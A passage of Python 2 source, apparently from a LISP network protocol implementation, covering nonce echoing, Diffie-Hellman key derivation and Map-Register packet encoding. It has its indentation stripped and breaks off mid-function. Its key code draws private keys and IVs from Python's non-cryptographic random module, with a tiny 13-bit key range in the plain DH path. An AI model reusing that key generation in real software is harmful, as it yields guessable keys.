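# Illustrative sketch (not called anywhere): a lisp_data_header
# encode/decode round-trip using the class above. The nonce and
# instance-id values are made up.
#
def lisp_example_data_header_roundtrip():
header = lisp_data_header()
header.nonce(0xabcdef)
header.instance_id(1000)
packet = header.encode()
decoded = lisp_data_header()
if (decoded.decode(packet) == False): return(None)
return(decoded.get_instance_id() == 1000)
#enddef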
class lisp_echo_nonce():
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# an echo response and some time (10 seconds) has passed.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start request-nonce mode. Get a new nonce. If a request-nonce is
# stored, use the same nonce as last time regardless of whether we
# received an echo response. The high-order bit set tells the caller
# to set the e-bit in the header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long it's been since the last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If the last received echo was a while ago and a new request-nonce
# was sent recently, say the echo happened so we can bootstrap a new
# request and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
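#
# Illustrative sketch (not called anywhere): the contract between
# lisp_echo_nonce.get_request_or_echo_nonce() above and the data-plane
# encapsulator. A returned nonce with the high-order bit (0x80000000)
# set tells the caller to put the 24-bit nonce in the LISP header and
# set the e-bit, i.e. to request that the remote xTR echo it back.
#
def lisp_example_is_request_nonce(nonce):
if (nonce & 0x80000000): return(nonce & 0xffffff)
return(None)
#enddef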
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key)
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
def key_length(self, key):
if (type(key) != str): key = self.normalize_pub_key(key)
return(len(key) / 2)
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (type(key) == str):
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#endif
key = lisp_hex_string(key).zfill(256)
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(int((g**key) % p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
# This should only be used in a lab for debugging and never live since
# it's a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != long): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != long): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context, data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
self.encrypt_key = lisp_hex_string(ek).zfill(32)
fill = 32 if self.do_poly else 40
self.icv_key = lisp_hex_string(ik).zfill(fill)
#enddef
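#
# Illustrative sketch (not called anywhere): the key derivation done in
# compute_encrypt_icv_keys() above. An HMAC-SHA256 over the shared
# secret, keyed with a context string built from the two public keys,
# yields 256 bits that are split into a 128-bit encrypt-key and a
# 128-bit ICV-key. The public keys are integers and the shared secret
# a byte string, as in the method above; input values are made up by
# the caller.
#
def lisp_example_derive_keys(local_pub, remote_pub, shared_secret):
import hmac, hashlib
context = "0001" + "lisp-crypto" + \
lisp_hex_string(local_pub ^ remote_pub) + "0100"
material = int(hmac.new(context, shared_secret, \
hashlib.sha256).hexdigest(), 16)
encrypt_key = (material >> 128) & LISP_16_128_MASK
icv_key = material & LISP_16_128_MASK
return([encrypt_key, icv_key])
#enddef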
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
hash_output = hexlify(hash_output)
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (by_rlocs.has_key(addr_str) == False):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in the cipher suite value, then insert key-length and public key
# material. Do not negotiate the ECDH 25519 cipher suites if the
# curve25519 library is not installed on the system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
# is enough packet to pull the key out according to the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64 bits) out at a time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = ""
for i in range(0, len(key), 2):
new_key += chr(int(key[i:i+2], 16))
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
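#
# Illustrative sketch (not called anywhere): the classic Diffie-Hellman
# exchange that lisp_keys falls back to when curve25519 is not in use.
# Each side computes g**private mod p for its public key; both sides
# then arrive at the same shared secret. The tiny g, p, and private
# values below are made up for readability; the real code uses the
# 1024-bit group in LISP_CS_1024_G/LISP_CS_1024_P.
#
def lisp_example_dh_exchange():
g, p = 2, 227
a_priv, b_priv = 71, 113
a_pub = (g**a_priv) % p
b_pub = (g**b_priv) % p
a_shared = (b_pub**a_priv) % p
b_shared = (a_pub**b_priv) % p
return(a_shared == b_shared)
#enddef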
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = Queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
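#
# Illustrative sketch (not called anywhere): how the control message
# type is recovered in lisp_control_header.decode() above. The type is
# the high-order nibble of the first byte; the low-order nibble carries
# type-specific flag bits.
#
def lisp_example_control_type(packet):
import struct
if (len(packet) < 1): return(None)
typeval = struct.unpack("B", packet[0])[0]
return([typeval >> 4, typeval & 0x0f])
#enddef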
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid is one of 8 values that encode the encryption key-id used for
# encrypting Map-Register messages. When the Map-Register is encrypted,
# the entire message, excluding the first 4 bytes, is chacha20
# encrypted. The e-bit must be set by the ETR to indicate that the
# Map-Register was encrypted.
#
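#
# Illustrative sketch (not called anywhere): the e-bit and kid field
# placement in the first long of a Map-Register, matching the encode()
# and decode() methods below. The e-bit is 0x2000 and the 3-bit kid
# sits at bits 14-16.
#
def lisp_example_map_register_ebit_kid(first_long):
encrypted = (first_long & 0x2000) != 0
kid = (first_long >> 14) & 0x7
return([encrypted, kid])
#enddef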
class lisp_map_register():
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
# Append zeroed authentication data so we can compute hash latter.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = ""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
